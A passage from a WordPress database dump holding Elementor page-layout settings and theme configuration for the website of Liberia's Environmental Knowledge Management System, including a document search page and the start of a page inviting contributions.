documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7db54a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a1c54ac\"}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6764de0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d13439\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_vertical_gap\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_color\":\"#0A3C11\",\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30198,4219,'_elementor_pro_version','3.3.6'),(30200,4220,'_elementor_edit_mode','builder'),(30201,4220,'_elementor_template_type','wp-page'),(30202,4220,'_elementor_version','3.4.1'),(30203,4220,'_wp_page_template','default'),(30204,4220,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}],\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#02010129\"},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.11299999999999954525264911353588104248046875,\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.88700000000000045474735088646411895751953125},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7db54a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a1c54ac\"}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6764de0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d13439\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_vertical_gap\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_color\":\"#0A3C11\",\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(30206,4220,'_elementor_pro_version','3.3.6'),(30208,91,'_elementor_controls_usage','a:7:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:5;}}s:5:\"style\";a:1:{s:14:\"section_border\";a:2:{s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:2:{s:16:\"content_position\";i:1;s:6:\"layout\";i:1;}}s:5:\"style\";a:1:{s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:1;}}}}s:24:\"jet-smart-filters-search\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_general\";a:5:{s:9:\"filter_id\";i:1;s:16:\"content_provider\";i:1;s:10:\"apply_type\";i:1;s:24:\"typing_min_letters_count\";i:1;s:10:\"show_label\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_label_style\";a:2:{s:27:\"label_typography_typography\";i:1;s:28:\"label_typography_font_weight\";i:1;}}}}s:28:\"jet-smart-filters-checkboxes\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_general\";a:5:{s:9:\"filter_id\";i:1;s:16:\"content_provider\";i:1;s:25:\"additional_providers_list\";i:1;s:10:\"show_label\";i:1;s:28:\"additional_providers_enabled\";i:1;}}s:5:\"style\";a:3:{s:19:\"section_items_style\";a:3:{s:16:\"filters_position\";i:1;s:32:\"filters_space_between_horizontal\";i:1;s:22:\"filters_list_alignment\";i:1;}s:22:\"section_checkbox_style\";a:4:{s:22:\"checkbox_border_border\";i:1;s:21:\"checkbox_border_width\";i:1;s:21:\"checkbox_border_color\";i:1;s:22:\"checkbox_border_radius\";i:1;}s:19:\"section_label_style\";a:2:{s:27:\"label_typography_typography\";i:1;s:28:\"label_typography_font_weight\";i:1;}}}}s:5:\"posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:3:{s:14:\"section_layout\";a:7:{s:5:\"_skin\";i:1;s:20:\"custom_template_list\";i:1;s:20:\"custom_skin_template\";i:1;s:21:\"custom_posts_per_page\";i:1;s:18:\"custom_same_height\";i:1;s:14:\"custom_link_to\";i:1;s:15:\"custom_postlink\";i:1;}s:13:\"section_query\";a:2:{s:15:\"posts_post_type\";i:1;s:14:\"posts_query_id\";i:1;}s:18:\"section_pagination\";a:1:{s:21:\"pagination_page_limit\";i:1;}}s:5:\"style\";a:2:{s:28:\"custom_section_design_layout\";a:2:{s:17:\"custom_column_gap\";i:1;s:14:\"custom_row_gap\";i:1;}s:24:\"section_pagination_style\";a:2:{s:18:\"pagination_spacing\";i:1;s:22:\"pagination_spacing_top\";i:1;}}}}s:28:\"jet-smart-filters-pagination\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:2:{s:15:\"section_general\";a:1:{s:16:\"content_provider\";i:1;}s:16:\"section_controls\";a:1:{s:19:\"pages_center_offset\";i:1;}}s:5:\"style\";a:1:{s:22:\"pagination_items_style\";a:8:{s:31:\"pagination_items_bg_color_hover\";i:1;s:28:\"pagination_items_color_hover\";i:1;s:29:\"pagination_items_vertical_gap\";i:1;s:30:\"pagination_items_border_border\";i:1;s:29:\"pagination_items_border_width\";i:1;s:29:\"pagination_items_border_color\";i:1;s:30:\"pagination_items_border_radius\";i:1;s:26:\"pagination_items_alignment\";i:1;}}}}}'),(30220,4223,'_elementor_edit_mode','builder'),(30221,4223,'_elementor_template_type','single-post'),(30222,4223,'_elementor_version','3.4.0'),(30223,4223,'_elementor_pro_version','3.3.6'),(30224,4223,'_wp_page_template','default'),(30225,4223,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(30226,4223,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"_id\":\"829b42e\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"29051df\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30228,4223,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(30239,3170,'_edit_lock','1629383512:43'),(30240,4225,'_elementor_edit_mode','builder'),(30241,4225,'_elementor_template_type','kit'),(30242,4225,'_elementor_page_settings','a:9:{s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:21:\"global_image_lightbox\";s:3:\"yes\";s:15:\"container_width\";a:2:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:4:\"1220\";}s:21:\"space_between_widgets\";a:2:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";}s:11:\"viewport_md\";s:0:\"\";s:11:\"viewport_lg\";s:0:\"\";s:13:\"custom_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:8:\"44024f53\";s:5:\"title\";s:14:\"Saved Color #5\";s:5:\"color\";s:7:\"#4054B2\";}i:1;a:3:{s:3:\"_id\";s:8:\"3531977a\";s:5:\"title\";s:14:\"Saved Color #6\";s:5:\"color\";s:7:\"#23A455\";}i:2;a:3:{s:3:\"_id\";s:5:\"c13f1\";s:5:\"title\";s:14:\"Saved Color #7\";s:5:\"color\";s:4:\"#000\";}i:3;a:3:{s:3:\"_id\";s:8:\"791da70b\";s:5:\"title\";s:14:\"Saved Color #8\";s:5:\"color\";s:4:\"#FFF\";}}s:15:\"viewport_mobile\";s:0:\"\";s:15:\"viewport_tablet\";s:0:\"\";}'),(30244,3170,'_wp_page_template','default'),(30245,3170,'_elementor_data','[]'),(30246,4226,'_elementor_edit_mode','builder'),(30247,4226,'_elementor_template_type','kit'),(30248,4226,'_elementor_page_settings','a:13:{s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:15:\"container_width\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:4:\"1220\";s:5:\"sizes\";a:0:{}}s:21:\"space_between_widgets\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:13:\"custom_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:8:\"44024f53\";s:5:\"title\";s:14:\"Saved Color #5\";s:5:\"color\";s:7:\"#4054B2\";}i:1;a:3:{s:3:\"_id\";s:8:\"3531977a\";s:5:\"title\";s:14:\"Saved Color #6\";s:5:\"color\";s:7:\"#23A455\";}i:2;a:3:{s:3:\"_id\";s:5:\"c13f1\";s:5:\"title\";s:14:\"Saved Color #7\";s:5:\"color\";s:4:\"#000\";}i:3;a:3:{s:3:\"_id\";s:8:\"791da70b\";s:5:\"title\";s:14:\"Saved Color #8\";s:5:\"color\";s:4:\"#FFF\";}}s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#0A3C11\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#54595F\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#7A7A7A\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:9:\"site_name\";s:65:\"Official Website of the Environmental Knowledge Management System\";s:16:\"site_description\";s:19:\"Republic of Liberia\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:15:\"activeItemIndex\";i:1;s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;}'),(30250,4226,'_wp_page_template','default'),(30251,4226,'_elementor_data','[]'),(30253,3170,'_elementor_version','3.4.1'),(30254,3170,'_elementor_pro_version','3.3.6'),(30276,4228,'_elementor_edit_mode','builder'),(30277,4228,'_elementor_template_type','wp-page'),(30278,4228,'_elementor_version','2.8.1'),(30279,4228,'_wp_page_template','default'),(30280,4228,'_elementor_data','[{\"id\":\"16c3779\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"92f1907\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e489cec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"843aa5e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contribute a knowledge resource to the EKMS\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f572fa2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2c7325b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ddf0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23948fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Ekmsliberia.info is managed by the <span style=\\\"color: #00ccff;\\\"><a style=\\\"color: #00ccff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/institution\\/environmental-protection-agency\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Environmental Protection Agency (EPA)<\\/a><\\/span> of Liberia in collaboration with several partner governmental and other institutions.<\\/p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.\\u00a0If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of 